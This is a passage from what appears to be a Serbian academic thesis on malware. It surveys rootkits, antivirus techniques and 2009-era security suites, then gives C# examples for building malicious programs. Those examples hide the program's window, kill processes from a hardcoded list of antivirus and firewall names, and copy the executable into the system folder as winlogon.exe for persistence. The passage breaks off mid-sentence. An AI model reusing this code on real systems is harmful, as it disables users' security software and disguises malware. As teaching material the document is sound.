ećim privilegijama na sistemu. Ovaj komplet je skup programa i koda koji omogućava p
ermanentno i neprimećeno prisustvo nekom računaru. Dizajniran je tako da sakrije svo
j programski kod i podatke na sistemu. Obično se koristi za udaljeni pristup ili p
risluškivanje (engl. eavesdropping) podataka na sistemu ili mreţi. Prvobitno je root
kit bio namenjen za udaljeno administriranje ili slične korisne operacije, meĎutim n
jegove pozitivne osobine su brzo zapazili zlonamerni korisnici. Ukoliko zlonamer
an korisnik poseduje potrebno znanje iz oblasti kompjuterske bezbednosti, rootki
t alatka u njegovim rukama postaje vrlo opasno oruĎe. Knjiga (Pleskonjić et al., 200
7) na sledeći način obraĎuje oblast rootkit alata.
8.1 Podela rootkit alata
Dve najznačajnije grupe rootkit alata su: aplikacioni rootkit alati – poput ostalih
aplikacija rade u korisničkom (engl. User mode) reţimu. rootkit alati na nivou jezgr
a – integrišu se u samo jezgro i rade na nivou jezgra (engl. Kernel mode).
Ove dve vrste alata razlikuju se po mestu u sistemu na kome su smešteni i načinu na
koji skrivaju svoje prisustvo u sistemu. Aplikacioni rootkit [46] alati se zasni
vaju na zameni legitimnih aplikacija zlonamernim datotekama. Ubačene datoteke omog
ućavaju napadaču da prikrije svoje prisustvo i da obavi ţeljene aktivnosti na sistemu.
Alat moţe da „otvori zadnja vrata“ koja napadač moţe da iskoristi za upad na sistem. Akci
je koje napadač sprovodi kako bi sakrio svoje prisustvo na sistemu, mogu se grupis
ati u: Skrivanje zlonamernih datoteka i direktorijuma koje je napadač ubacio; S
vanje procesa koje je napadač pokrenuo; Onemogućavanje ubijanja procesa koje je napa
dač pokrenuo; Prikrivanje aktivnosti napadača na mreţi; Skrivanje unosa u datoteku cro
ntab; Skrivanje zapisa u log datoteci o vezama koje napadač ostvaruje sa udaljenim
sistemom.
Rootkit alati na nivou jezgra [46] otkrivaju se teţe od aplikacionih, jer se integ
rišu u samo jezgro operativnog sistema, što znači da ih moţe zaobići provera integriteta s
istema obavljena u neprivilegovanom reţimu rada.
S t r a n a | 40
Ovi alati koriste modularnu arhitekturu nekih operativnih sistema, poput Linuxa,
u kome je jezgro sastavljeno od modula. Korisnik sa root privilegijama moţe u jez
gro učitati novi modul (engl. Loadable Kernel Module) i na taj način obezbediti prošir
enje funkcionalnosti operativnog sistema.
8.2 Linux
Zbog načina na koji Linux operativni sistem tretira prava pristupa korisnika, kraĎa
informacija sa računara pod ovakvim operativnim sistemom dodatno je oteţana. Napadači
su morali da pronaĎu načine „zavaravanja“ ovih mehanizama kako bi sakrili svoje prisustv
o u sistemu. Iz tih razloga, napadači koriste rootkit alate. Napad na sistem zasno
van na rootkit alatima izvodi se u četiri faze: Sakupljanje informacija o sistemu
koji se ţeli provaliti, kao na primer: koja distribucija operativnog sistema je pi
tanju, koja verzija jezgra, koji korisnički nalozi postoje ... Sticanje administra
torskih prava, tačnije prava koja ima root korisnik, a koja su najčešće neophodna za ins
talaciju; Ubacivanje i instaliranje rootkit alata; Uspostavljanje kontrole nad c
iljnim sistemom.
8.3 Windows rootkit
Upotrebom postojećeg interfejsa u Windows operativni sistem se moţe ubaciti zlonamer
an kod. Windows operativni sistem sadrţi odreĎene komponente koje omogućavaju nadograd
nju sistema alatima drugih proizvoĎača. Primer toga je proces prijavljivanja na sist
em (engl. User logon process) koji se moţe proširiti novim programima i bibliotekama
. Kako standardna procedura prijavljivanja na Windows sistem počinje zadavanjem ko
mbinacije tastera Ctrl+Alt+Delete, proces winlogon, koji nastaje pokretanjem dat
oteke winlogon.exe, poziva standardnu Windows biblioteku msgina.dll koja provera
va identitet korisnika na osnovu unetog korisničkog imena i lozinke. Proces prijav
ljivanja moţe da se izmeni korišćenjem trojanskog konja FakeGINA, koji zapravo predsta
vlja rootkit alat. Sledeću bitnu stavku Windows rootkit alata predstavlja deaktivi
ranje sistema zaštite datoteka. Prilikom instalacije operativnog sistema generiše se
spisak značajnih sistemskih datoteka. Zamena ovih datoteka drugim verzijama moguća
je jedino ukoliko administrator instalira sistemski Service Pack ili neku zvaničnu
zakrpu (engl. hotfix). Napadači često moraju da promene neku sistemsku datoteku koj
a nije predviĎena da se menja. Da bi u tome uspeli, potrebno je da onesposobe Wind
ows sistem zaštite datoteka WFP (engl. Windows File Protection).
S t r a n a | 41
DLL injection [48] i API hooking [49] predstavljaju tehnike napada na procese. N
apadač ubacuje zlonameran kod u neki proces i na taj način menja originalnu funkciju
procesa. Tehnika ubrizgavanja DLL biblioteke (engl. DLL injection), izvodi se u
bacivanjem zlonamerne DLL biblioteke u memorijski prostor aktivnog procesa. API
hooking tehnika nadovezuje se na DLL injection i predviĎa ubacivanje zlonamernih r
ootkit funkcija u legitimne DLL datoteke. Program AFX Windows Rootkit [51] preds
tavlja alat koji kombinuje tehnike DLL injection i API hooking. Ova aplikacija p
rikriva aktivne procese u sistemu, direktorijume, datoteke, zapise u registry ba
zi, TCP i UDP portove itd. Alat AFX Windows Rootkit nije u stanju da otvori “zadnj
a vrata“ da bi ušao u sistem, te je neophodno najpre formirati „ulaz“ u sistem pomoću neko
g drugog alata. Prisustvo alata koji je otvorio ulaz u sistem se potom prikriva
uz pomoć AFX Windows Rootkit alata.
Slika 8.1 AFX Windows Rootkit 2003 – preuzeto iz [50]
8.4 Detekcija i uklanjanje rootkit alata
Rootkit alati za sobom ipak ostavljaju neki trag. Razlika u slici sistema spada
u najznačajnije. Rezultati skeniranja sistema na najvišem nivou (Windows API) i rezu
ltati skeniranja sistema na najniţem nivou (sadrţaj sistema datoteka ili baze Regist
ry na disku) se ne poklapaju. Alati (aplikacioni rootkit ili rootkit jezgra) koj
i manipulišu API-jem da bi se sakrili, mogu se otkriti na osnovu razlike izmeĎu info
rmacija pribavljenih od API-ja i informacija dobijenih pri skeniranju strukture
sistema datoteka. Jedno je sigurno, lakše je sprečiti instaliranje ovih alata nego i
h kasnije otkriti i ukloniti. Korisnici imaju na raspolaganju programe namenjene
otkrivanju i uklanjanju rootkit alata, kao na primer: Black Light, Rootkit Reve
aler, Chkrootkit...
S t r a n a | 42
Slika 8.2 BlackLight [51] & Rootkit Revealer [52]
Slika 8.3 Program Chkrootkit [53]
S t r a n a | 43
9. ZAŠTITA OD ZLONAMERNIH PROGRAMA
Prvi zlonamerani programi su najčešće bili bezopasni, a šteta koju su nanosili korisniku
ogledala se u njegovom uznemiravanju. Kako je vreme prolazilo zlonamerni progra
mi su počeli zauzimati sve više prostora na diskovima, uništavati i menjati podatke na
računaru, sakupljati i krasti lične podatke od korisnika... Svakodnevno se pojavlju
ju novi maliciozni programi, koji koriste kompleksnije metode napada i nanose veću
štetu računarima. Najčešća opasnost od zlonamernih programa korisnicima preti od Internet
a (surfovanje web-om, skidanje krekovanih programa, itd.), elektronske pošte i sig
urnosnih propusta u operativnim sistemima i aplikacijama. Zaštita od Interneta i e
lektronske pošte se moţe ostvariti instaliranjem antivirusnih paketa [54] i redovnim
osveţavanjem baze virusa. Upotrebom javno dostupnih web servisa za primanje elekt
ronske pošte, kao recimo www.Gmail.com, nivo bezbednosti se podiţe na viši nivo. U tom
slučaju sama kompanija (u ovom slučaju Google) brine o ispravnosti onoga što pristiţe u
elektronsko sanduče. Problematika vezana za probleme sa bezbednosnim propustima u
operativnim sistemima i raznim programima, je mnogo kompleksnija. Njihovo ublaţav
anje moţe se ostvariti redovnim instaliranjem bezbednosnih zakrpa i paţljivim odabir
om aplikacionih programa. Ohrabruje činjenica da većina današnjih programa ima mogućnost
automatskog preuzimanja popravki putem Interneta. MeĎutim, ova osobina je doprine
la tome da se sve češće, pod pritiskom konkurencije, izbacuju nezrele verzije programa
i operativnih sistema. Ovakvi programi su prepuni bezbednosnih propusta, a kori
snici na taj način obavljaju posao Beta testera, iako toga nisu ni svesni. Upotreb
a antivirusnog programa i njegovo redovno aţuriranje, iako neophodno na svakom račun
aru, u praksi se ponekad ne poštuje. Većina korisnika zanemaruje ovaj segment bezbed
nosti sve do trenutka dok ne postanu ţrtve zlonamernih programa. Pojava besplatnih
antivirusnih paketa omogućila je da danas svaki korisnik sebi moţe da priušti osnovni
nivo zaštite. To što korisnik poseduje antivirusni program, čiju bazu redovno osveţava,
ne čini ga apsolutno bezbednim. O ovome svedoče napadi brzih crva, takozvanih fast
burnera, koji su u stanju da se rašire u roku od nekoliko sati. Ukoliko kompanija
koja proizvodi antivirusni program nije dodala definiciju virusa (potpis virusa)
u svoju bazu potpisa, postoji opravdana sumnja da takav virus moţe neopaţeno ući u si
stem, jer antivirus neće biti u stanju da ga pravilo detektuje.
9.1 Podela antivirusnih programa
Antivirusni paketi se razvijaju uporedo sa razvojem zlonamernih program koje tre
ba da spreče. U knjizi (Pleskonjić et al., 2007) razvoj antivirusnih paketa se deli
na četiri generacije [55]:
S t r a n a | 44
Prva generacija - Skener koristi potpise virusa ili promene u duţini programa da o
tkrije virus; Druga generacija - Koriste se heuristička pravila ili kontrolne sume
(engl. checksum) da se uoče promene i virusna infekcija; Treća generacija - Program
i identifikuju virus na osnovu akcija; Četvrta generacija - Paketi sa raznovrsnim
antivirusnim tehnikama kao što su skeniranje, “zamke za aktivnosti” (engl. activity tr
aps), kontrola pristupa itd.
Trenutno se razvijaju mnoge napredne antivirusne tehnike, kao na primer generičko
dešifrovanje (koristi se CPU simulatori da bi se proverio potpis programa i ponašanj
e, pre nego što ih stvarno i pokrene).
9.2 Odabir antivirusnog alata
Dobar antivirusni alat treba da obezbedi sledeće: Prevencija (engl. prevention) – Me
hanizam za blokiranje infekcija; Otkrivanje (engl. detection) – Detektovanje zlona
mernog programa u inficiranom sistemu; Reakcija (engl. reaction) – Vraćanje sistema
u stanje pre infekcije, čišćenje sistema.
Uglavnom svi savremeni antivirusni programi podrţavaju navedene stavke. Zbog toga
su firme i pojedinci često u dilemi koji alat za odbranu od zlonamernih programa o
dabrati. Jedno je sigurno, svemoguć antivirusni alat ne postoji. Pri odabiru progr
ama, korisnik se moţe voditi veličinom baze definicija virusa koju alat poseduje, la
koćom njenog osveţavanja, heurističkim sposobnostima samog alata (detekcija nepoznatih
virusa), tačnošću detekcije, brzinom alata i naravno cenom proizvoda. Antivirusni ala
ti su u stanju precizno detektovati samo poznate viruse, tj. one viruse čiji se po
tpisi nalaze u bazi virusa antivirusnog paketa. Zbog toga se proizvoĎeči trude da nj
ihove baze budu redovno aţurirane novim definicijama virusa. Često same kompanije ko
je prave antivirusne pakete kreiraju svoje viruse u cilju testiranja proizvoda i
podizanja broja definisanih virusa u bazi virusa. U slučaju pojave novog zlonamer
nog programa, jedino što moţe odbraniti korisnika jesu heurističi algoritmi [56] imple
mentirani u samom programu. Ovaj način detekcije je prilično neprecizan, a neretko d
etektuje problematičan kod i kada to nije. Loša detekcija direktno utiče na tačnost dete
kcije. Antivirusni alati u cilju podizanja brzine skeniranja pribegavaju raznim
optimizacijama. Najradikalnije od svih su pregledanje datoteka samo sa odreĎenim e
kstenzijama i pregledanje kompresovanih datoteka samo do odreĎenog nivoa kompresij
e. Iako ovo neminovno povećava brzinu skeniranja, sa druge strane se ţrtvuje precizn
ost detekcije.
S t r a n a | 45
Na kraju korisnik mora da odluči koliko je spreman da plati za sve ovo. Većina kompa
nija nudi besplatne (uglavnom ograničene) verzije svojih alata za zaštitu. One su ob
ično sasvim dovoljne za ličnu upotrebu, ali ne i za poslovnu.
S t r a n a | 46
10. INTERNET SECURITY PAKETI
Ukoliko koristite računar bez nekog antivirusnog paketa, imaćete mnogo sreće ako ne „zak
ačite nešto” već posle nekoliko minuta provedenih na Internetu. Korišćenje nekog zaštitnog
grama u današnje vreme postaje obaveza. Za koji god paket da se odlučite, bez obzira
na njegov kvalitet, bolja je opcija nego da ga uopšte nemate. Uvek je bolje imati
kompletnu zaštitu, zato je poţeljno odabrati paket koji u sebi pored antivirusa sad
rţi firewall [58], anti-spam zaštitu [59] i ostale dodatke. U nastavku će biti predsta
vljeni aktuelni Internet Security [60] paketi, kao kompletna zaštita od zlonamerni
h programa. Trenutno postoji nekoliko desetina ovakvih paketa, od tog broja samo
njih nekoliko zauzima značajniji deo svetskog trţišta. Odluku o tome koji je paket na
jbolji nije moguće doneti, jer je tako nešto veoma teško odrediti zbog široke primene ov
ih paketa. Kod nekih alata bolje radi firewall, negde je algoritam za proveru vi
rusa kvalitetniji, neko ima aţurniju bazu potpisa virusa... Istovremena instalacij
a dva antivirusna paketa neće duplirati sigurnost računara, već naprotiv, učiniće samo da
ni jedan od njih ne radi kako treba. Iako proizvoĎači antivirusnih programa meĎusobno
tesno saraĎuju, često je nemoguće na istom računaru, pod istim operativnim sistemom imat
i instalirana dva različita antivirusna paketa. U članku o antivirusnim paketima (Bu
banja, 2009), [57] analiziraju se najnoviji Internet Security alati.
10.1 Kaspersky Internet Security 2010
Pri pomeni antivirusa, prva asocijacija je Kaspersky, najviše zahvaljujući Jevgeniju
Kasperskom, ako ne najboljem, onda definitivno najeksponiranijem stručnjaku za an
tiviruse. Kaspersky Internet Security [61] je jedan od najboljih Internet Securi
ty paketa. Ovaj paket se moţe nabaviti u velikom broju lokalizovanih verzija, pa j
e veoma popularan u zemljama van engleskog govornog područja. Instalacija Kaspersk
y Internet Security paketa spada u inteligentne instalacije. Po pokretanju insta
lacione procedure, program prvo proverava da li na zvaničnom sajtu postoji novija
verzija paketa od one koja se nalazi na računaru i prema potrebi je preuzima. Nako
n toga, proverava da li je uključena neka vrsta zaštite (recimo Microsoft Windows Fi
rewall) i preporučuje korisniku da je ugasi kako bi se izbegli mogući konflikti u ka
snijem radu. Podrţava mogućnost aktiviranja antivirusa prilikom instaliranja paketa,
opcija self-defence, koja omogućava instalaciju Kaspersky Internet Security paket
a čak i na računare koji su zaraţeni malicioznim programima, a koji su u stanju da dea
ktiviraju antivirusne pakete. Aktivacija Kaspersky Internet Security paketa obav
lja se preko Interneta, a nakon toga sledi obavezan update programa i baze potpi
sa virusa.
S t r a n a | 47
Paket se sastoji iz četiri celine: Anti-Malware, System Security, Online Security
i Content Filtering. Anti-Malware je u stvari klasičan antivirusni deo (Kaspersky
Antivirus) koji štiti fajlove na računaru, elektronsku poštu i fajlove u trenutku kada
se preuzimaju sa Interneta, a pruţa i zaštitu pri surfovanju. Sistemska sigurnost (
engl. System Security) obezbeĎuje praćenje prava pristupa pojedinih aplikacija i uzb
unjivanje korisnika ukoliko se primeti neka neobična aktivnost. U sistemsku sigurn
ost spada firewall, koji je u stanju da uči navike korisnika, ali i proaktivna zašti
ta koja predstavlja neku vrstu napredne heuristike. Online Security podrazumeva
antiphishing, Network Attack Blocker (odbijanje napada s drugih kompjutera) i an
tidialer. Content Filtering je deo koji je zaduţen za filtriranje sadrţaja uklanjanj
em spamova, blokiranje reklama i roditeljskom kontrolom. Kaspersky Internet Secu
rity omogućava visok stepen kontrole svih parametara, iako i sa podrazumevanim vre
dnostima obezbeĎuje odgovarajući stepen zaštite.
Slika 10.1 Kaspersky Internet Security 2010 – preuzeto iz [61]
Provera se vrši na zahtev korisnika ili u realnom vremenu, a sigurnost ovog paketa
potvrĎena je i kroz nekoliko nezavisnih i široko prihvaćenih testova. TakoĎe je dobitni
k nekoliko sertifikata koje dodeljuju nezavisne organizacije za proveru antiviru
snih rešenja:
S t r a n a | 48
Virus Bulletin 100% – Dodeljuje se antivirusnim programima koji pronaĎu sve aktuelne
viruse, tokom preuzimanja programa sa mreţe i tokom skeniranja sistema. ISCA sert
ifikat – Dodeljuje se programima koji su u stanju da zaštite korisnika od svake vrst
e zlonamernih programa. Sertifikat se obnavlja svake godine. West Coast Labs Che
ckmark level 1 & 2 sertifikati – Dodeljuju se antivirusima koji pronalaze sve viru
se i pri tom ne podiţu laţne uzbune, onemogućavaju replikaciju virusa i uspevaju da de
zinfikuju sve viruse za koje do tog trenutka postoji siguran način za dezinfekciju
. Kaspersky Internet Security prilikom kompletnog skeniranja pravi bazu skeniran
ih fajlova, te je svaki sledeći full-scan znatno brţi od inicijalnog, koji se pokreće
odmah nakon instalacije.
10.2 AVG Internet Security 8.5
AVG Internet Security [62] paket je jedan od retkih besplatnih antivirusnih pake
ta koji zasluţuje paţnju korisnika. Ovde će ipak biti predstavljena komercijalna verzi
ja, da bi paket bio konkurentan sa ostalim Internet Security paketima. Pri insta
liranju AVG proverava da li na računaru postoji neki drugi antivirus i obaveštava ko
risnika o tome. TakoĎe moţete da odaberete i plug-in module za neki od alternativnih
mail klijenata. Ukoliko se korisnik odluči da instalira firewall, automatski će bit
i deaktiviran ugraĎeni Windows Firewall. Nakon instalacije trebalo bi proći kroz čarob
njaka koji omogućava podešavanje osnovnih parametara vezanih za skeniranje, skidanje
novih verzija programa, preuzimanje novih potpisa virusa, itd. Skeniranje diska
je potrebno pokrenuti ručno, u slučaju antivirusa, nakon instalacije programa.
S t r a n a | 49
Slika 10.2 AVG Internet Security 8.5 – preuzeto iz [57] AVG paket se sastoji od an
tivirusne, antispyware, antispam komponente, firewalla, antirootkita, e-mail ske
nera, link skenera, Web i Resident štitova. Svaka od pomenutih komponenti se zaseb
no aktivira i podešava. Novine u odnosu na ostale programe su Web, Link i Resident
Sheild, koji sluţe za proveru web sajtova u realnom vremenu, linkova na njima i f
ajlova na lokalnom računaru kako bi se izbegle moguće infekcije. Osnova podešavanja ov
og paketa ne uključuju proveru rootkit infekcije, a takoĎe ni proveru multimedijalni
h fajlova. Ovo je glavni razlog što je vreme skeniranja celog sistema sa ovim prog
ramom kraće nego kod Kasperskog. Povećanjem prioriteta skeniranja, direktno u progra
mu, vreme skeniranja se moţe dodatno smanjiti. Ponovljeno skeniranje je tek za nij
ansu brţe, što govori da AVG ne kreira bazu skeniranih fajlova, već ceo proces punog s
keniranja obavlja detaljno svaki put kada se pokrene. Pozitivna osobina ovog pro
grama je to što zauzima zaista minimalne resurse računara u toku rada, naročito kada j
e u pitanju operativna memorija. TakoĎe ovaj paket ne zahteva skoro nikakva podešava
nja, već se nakon instalacije po automatizmu uključuju svi servisi, koji se lako mog
u isključiti.
10.3 BitDefender Internet Security 2009
BitDefender Internet Security [63] paket zahteva aktivnu internet konekciju pril
ikom instalacije, jer se u prvom trenutku preuzima samo installer, koji nakon po
kretanja skida ostatak podataka potrebnih za instalaciju. Pri instalaciji se isk
ljučuje ugraĎeni Windows Firewall i Windows Defender, radi izbegavanja konflikta. Na
kon
S t r a n a | 50
instalacije ne zahteva se automatsko aţuriranje baze potpisa malicioznih programa,
već se to mora obaviti ručno, što moţe predstavljati ozbiljnu manu ovog paketa.
Slika 10.3 BitDefender Internet Security 2009 – preuzeto iz [57] U toku rada BitDe
fender se ponaša veoma dobro. Program sa automatski podešenim setovanjima podiţe kompl
etnu zaštitu računara. Većina korisnika će biti zadovoljna stepenom zaštite koja je aktivi
rana takvim podešavanjima. Interfejs je jednostavan i jasno ukazuje na eventualne
pretnje. Dosta paţnje autori programa su posvetili optimizaciji prilikom skeniranj
a, što je lako uočljivo ukoliko se uporede brzine skeniranja u tekućoj i prethodnoj ve
rziji ovog paketa. Prilikom skeniranja pravi se log datoteka u koji se upisuju i
nformacije o statusu svake skenirane datoteke i poslednjem vremenu pristupa. Na
ovaj način se kasnijim skeniranjima dodatno štedi vreme. Ukoliko je datoteka pri pre
thodnom skeniranju označena kao neinficirana, a u meĎuvremenu joj niko nije pristupa
o, program će je preskočiti prilikom sledećeg skeniranja. Internet Security paket sadrţi
alate koji pronalaze viruse i spyware programe. Korišćenjem napredne proaktivne teh
nike zaštite u stanju je da detektuje kako poznat maliciozan kod, tako i onaj koji
se ne nalazi u bazi potpisa virusa. Dobro se snalazi i sa rootkit pretnjama, a
poseduje i anti-phishing zaštitu od prikaza laţnih web stranica koje imaju za cilj p
reuzimanje informacija od korisnika. TakoĎe sadrţi mogućnost aktiviranja roditeljske z
aštite, kao i moda za igranje (engl. Gaming mod). U ovom modu program privremeno s
pušta zaštitu na nivo koji minimalno utiče na performanse sistema, čime se igračima omoguća
a da izvuku maksimum iz računara, a da pri tom ipak zadrţe i odreĎeni stepen zaštite. No
vinu predstavlja opcija koja detektuje osetljive tačke sistema, kao na primer post
ojanje novih bezbednosnih zakrpa za Windows koje nisu instalirane. Ovime se takoĎe
doprinosi povećanju sveukupnog stepena zaštite.
S t r a n a | 51
U mreţnom okruţenju program radi odlično. Veoma lako se sa jednog računara moţe pokrenuti
skeniranje bilo kog drugog računara u mreţi. TakoĎe se jednom računaru u mreţi moţe dodelit
uloga update servera, koji će nove potpise virusa preuzeti sa Interneta i potom i
h distribuirati do ostalih računara u mreţi.
10.4 ESET NOD32 Smart Security
Sve do verzije 3, glavna zamerka korisnika bila je da je interfejs programa komp
leksan i teţak za podešavanje. Novije verzije NOD32 programa [64] na prvi pogled del
uju veoma jednostavno, pošto u osnovnom modu korisniku gotovo i ne nude nikakve op
cije za podešavanje. Napredna podešavanja su dobro sakrivena, kako bi se dobio odličan
balans izmeĎu jednostavnosti upotrebe i finog podešavanja programa. Zaštita setovanja
programa se moţe osigurati postavljanjem šifre. Šifra je inače potrebna i za neke druge
stvari kao što je na primer update antivirusne baze, a ona se dobija kupovinom pr
oizvoda ili zahtevom za dobijanje probne (engl. trial) šifre preko sajta proizvoĎača.
Korisniku se u toku instalacije nudi da učestvuje u ThreatSense.Net sistemu ranog
upozorenja, koji automatski šalje informacije proizvoĎaču, tj. kompaniji ESET, o event
ualnom novom virusu ili nepoznatoj pretnji.
Slika 10.4 NOD32 ESET Smart Security
S t r a n a | 52
NOD32 ESET Smart Security paket poseduje detekciju potencijalno neţeljenih aplikac
ija, koja ne radi po principu antivirusa, ali omogućava sprečavanje prikrivenog inst
aliranja aplikacija na računaru. Paket se sastoji iz antivirusnog i antispyware mo
dula, firewalla i antispam aplikacije. NOD32 Firewall, pruţa mogućnost da računar bude
nevidljiv u lokalnoj mreţi. Smart scan je fabrički podešeno skeniranje na ovom progra
mu. Potpuno skeniranje diska i svih fajlova na njemu vrši se ručnim podešavanjem opcij
a odabirom In-depth sistema skeniranja i čekiranjem svih lokalnih diskova u Custom
scan sekciji programa. Algoritam za skeniranje je veoma brz, od dva do četiri put
a brţi u odnosu na slične pakete. Razlika u vremenu skeniranja prvog i drugog puta p
ostoji, ali iznosi oko 20 procenata, te se ne moţe zaključiti da li program pravi lo
g skeniranih datoteka koji će koristiti pri sledećem skeniranju.
10.5 Norton Internet Security 2009
Vidljivo poboljšanje Norton Internet Security [65] paketa odnosi se na mnogo brţi pr
oces instalacije, u odnosu na prethodne verzije, koji je sveden na nekoliko minu
ta. Program u svakom trenutku nudi grafički prikaz ukupnog zauzeća procesora i dela
koji zauzima sam Norton Internet Security pakt.
Slika 10.5 Norton Internet Security 2009 – preuzeto iz [57] Paket se sastoji od an
tivirusa, spyware zaštite, firewalla, antiphishing sekcije, a omogućava zaštitu identi
teta korisnika i mreţnu zaštitu. TakoĎe
S t r a n a | 53
prepoznavanje rootkit i botnet aplikacija, kao i još desetak drugih tehnologija zašt
ite računara i privatnosti korisnika. Norton poseduje Norton Insight opciju, koja
ima zadatak da identifikuje datoteke koje su sigurne i proverene. Ove datoteke u
budućnosti neće morati ponovo da se skeniraju, čime se ubrzava proces skeniranja. Ant
ivirusni deo ovog paketa ponaša se vrlo dobro, što se ne moţe reći za antispyware kompon
entu, koja često ne prijavljuje inficirane fajlove. Norton je sposoban da proverav
a i stanje na umreţenim računarima, za šta postoji poseban deo unutar programa. Podrţana
je opcija roditeljske kontrole korišćenja računara, koja se nalazi u sekciji za podešav
anje programa, i zahteva naknadno preuzimanje dodatnih modula sa Interneta.
10.6 F-Secure Internet Security 2009
F-Secure Internet Security [66] prilikom instalacije jedino što dopušta da odabere k
orisniku jeste opcija roditeljske kontrole. Update baze se radi automatski po za
vršetku instalacije, tako da korisnik o tome ne treba da vodi računa. Program je jed
nostavan za upotrebu i u većini slučajeva će standardno podešene postavke korektno obavi
ti posao. Izmenom pojedinih podešavanja se moţe smanjiti opterećenje procesora. Ovaj p
aket nudi kompletnu zaštitu računara, uključujući firewall i kontrolu spama (koja sa osn
ovnim podešavanjima dodatno usporava preuzimanje elektronske pošte).
S t r a n a | 54
Slika 10.6 F-Secure Internet Security 2009 – preuzeto iz [57] Tehnologija DeepGuar
d omogućava, brzu reakciju na pojavu infekcija. Ona analizira ponašanje sumnjivih pr
ograma i na osnovu toga odlučuje da li će ih okarakterisati kao validne aplikacije i
li kao potencijalne pretnje za računar. Specifičnost ovog paketa je to što koristi nek
oliko različitih algoritama za skeniranje. Mana ovog paketa je nedostatak phishing
komponente koja je u stanju da detektuje i upozori korisnika kada se učitava taka
v sajt. Phishing komponenta kod većine paketa predstavlja standardnu opciju. TakoĎe,
ovo je jedini poznatiji paket koji nije dovio VB 100% i ISCA sertifikate. Razli
ka u brzini izmeĎu prvog i drugog skeniranja postoji, ali ne u dovoljnoj meri, da
bi se utvrdilo postojanje loga skeniranih fajlova.
S t r a n a | 55
10.7 Uporedne karakteristike
U članku o antivirusnim paketima (Bubanja, 2009), [57] data je tabela sa uporednim
prikazom najzastupljenijih Internet Security alate.
Slika 10.7 Uporedne karakteristike Internet Security paketa – preuzeto iz (Bubanja
, 2009)
S t r a n a | 56
11. PRIMERI KODA
U ovom poglavlju biće prezentovani delovi koda koji se mogu upotrebiti za kreiranj
e zlonamernih programa. Kod je napisan u C# programskom jeziku [67] i koristi .N
ET 3.5 tehnologiju [68]. Za implementaciju i testiranje biće korišćen programski alat
Microsoft Visual Studio 2008 [69], a projekat će biti u formi konzolne aplikacije.
11.1 Inicijalna klasa
Primer koda inicijalne klase dat je u nastavku teksta. Generisanjem ovog koda st
vara se izvršna (Program.exe) datoteka koju korisnik mora da pokrene da bi se apli
kacija startovala.
using System; using System.Collections.Generic; using System.Linq; using System.
Text; using System.IO; using System.Diagnostics; ... class Program { [DllImport(
"user32.dll")] static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); [DllImp
ort("user32.dll")] public static extern IntPtr FindWindow(string lpClassName, st
ring lpWindowName); [DllImport("user32.dll")] internal static extern int Message
Beep(int uType); [STAThread] static void Main(string[] args) { //Skrivanje pokre
nutog programa ShowWindow(FindWindow("ConsoleWindowClass", null), 0); while(true
) { //Zvuk beep MessageBeep(100); //Stopiranje izvršenja programa na 10 skundi Sys
tem.Threading.Thread.Sleep(10000); } } }
S t r a n a | 57
Klasa koja nosi ime Program, sadrţi samo glavnu (engl. Main) funkciju koja se izvrša
va pri pokretanju programa. Ova klasa koristi standardnu Windows biblioteku user
32.dll. Program bi po pokretanju izvršio prikrivanje svojih aktivnosti, tako što bi
sebe uklonio sa Desktop-a, Taskbar-a i Task Manager-a. Prosečan korisnik (ţrtva) ne
bi bio u stanju da primeti da je program aktiviran na računaru. Dodatne informacij
e o funkcijama ShowWindow [70] i FindWindow [71] mogu se pronaći na Microsoft MSDN
sajtu.
Slika 11.1 Neposredno pre pokretanja skrivanja
S t r a n a | 58
Slika 11.2 Neposredno po izvršenom skrivanju Po izvršenju skrivanja, program bi započe
o da svakih 10 sekundi ispušta zvučni „beep” signal. Ovakav program ne nanosi nikakvu štet
u osim što troši resurse računara i iritira korisnika. TakoĎe ne postoji mogućnost automat
skog širenja, a jednostavan restart računara bi zaustavio njegovo izvršenje. Da bi pro
gram učinili ozbiljnijim potrebno je dodati nove funkcionalnosti.
11.2 Onesposobljavanje zaštite
Kada zlonameran kod dospe u sistem, pre započinjanja bilo kakve akcije, poţeljno je
da pokuša da onemogući aktivaciju alarma bezbednosnih sistema. Primer koda koji vrši o
nesposobljavanje bezbednosnih sistema, ubijanjem njihovih procesa, dat je u nast
avku.
using System.Diagnostics; ... private static void KillSecurity() { string[] proc
essList ={ "NPROTECTED", "NAVW32", "F-AGNT95", "NOD32", "NETD32", "NETMON", "IOM
ON98", "SCAN32", "NORMIST", "NAVW3", "ADAWARE", "AGENTW", "LU32", "NAVAP32", "AN
TIVIR", "TCM", "W9X", "AVKSERV", "AV", "ACKWIN32", "AD-AWARE", "ADVXDWIN", "AGEN
TSVR", "AGENTW", "ANTIVIRUS", "ANTS", "APIMONITOR", "APLICA32", "ARR", "AUPDATE"
, "AUTODOWN", "AUTOTRACE", "AVE32", "AVGCC32", "AVGCTRL", "AVGNT", "CFINET", "CL
EANPC", "CTRL", "CV ", "DATEMANAGER ", "DOORS", "DPFSETUP ", "FCH32 ", "FNRB32",
"POP3TRAP", "ZONEALARM"}; S t r a n a | 59
Process[] myProcesses; foreach (String _proc in processList) { myProcesses = Pro
cess.GetProcessesByName(_proc); { if (myProcesses.Length > 0) { foreach (Process
_item in myProcesses) { _item.CloseMainWindow(); } } } } }
Metoda KillSecurity je zaduţena za gašenje procesa nekih programa koji se brinu o be
zbednosti sistema. Za rad sa procesima metod koristi mogućnosti koje nudi klasa Sy
stem.Diagnostics.Process [72]. Ukoliko je neki od navedenih procesa aktivan, biće
ukinut. Uspešno izvršenje ovog metoda dovodi do pada nivoa bezbednosti samog sistema
, a zlonamernom programu se dozvoljava dalje nesmetano izvršavanje na inficiranom
sistemu.
11.3 Širenje infekcije po sistemu
Zlonameran program koji je po pokretanju uspeo da uspešno deaktivira sigurnosne pr
ocese moţe da započne sa širenjem unutar sistema. Širenje se najčešće vrši repliciranjem da
e na drugu lokaciju unutar sistema (npr. crvi) ili kopiranjem odreĎenog koda unuta
r postojeće datoteke (npr. virusi). Funkcionalnost kopiranja fajlova sa jedne loka
cije na drugu moţe se ostvariti upotrebom System.IO.File.Copy funkcije [73].
using System.IO; ... File.Copy(Application.ExecutablePath, System.Environment.Sy
stemDirectory + @"\winlogon.exe ");
Posebnu zanimljivost predstavlja kopiranje datoteka u direktorijume čija se sadrţina
automatski izvršava pri podizanju sistema, kao na primer ..\Start Menu\Programs\S
tartup. Na ovaj način zlonamerna aplikacija će biti automatski pokrenuta pri svakom
